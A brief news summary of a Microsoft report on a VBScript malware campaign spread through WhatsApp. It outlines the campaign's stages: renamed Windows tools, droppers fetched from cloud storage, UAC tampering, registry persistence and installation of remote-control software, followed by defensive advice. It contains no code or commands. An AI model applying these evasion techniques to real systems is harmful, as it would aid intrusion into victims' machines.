Overview
- Microsoft reports a WhatsApp-delivered Visual Basic Script attack that focuses on the Windows desktop client, though one outlet warned that WhatsApp Web users may also face risk.
- The script starts the infection by creating hidden folders and dropping renamed copies of built‑in Windows tools, such as curl.exe and bitsadmin.exe, to make its actions look normal.
- Those renamed tools fetch new droppers from well-known cloud storage, including Amazon S3, Tencent Cloud, and Backblaze B2, which helps the traffic pass as legitimate.
- The malware weakens protections by altering User Account Control prompts, repeatedly launching Command Prompt with elevated rights, and adding registry keys to survive reboots.
- In the final stage it installs unsigned MSI packages, including remote-control software like AnyDesk, and Microsoft urges organizations to block script hosts, watch cloud-bound traffic, and train users to treat unexpected attachments with caution.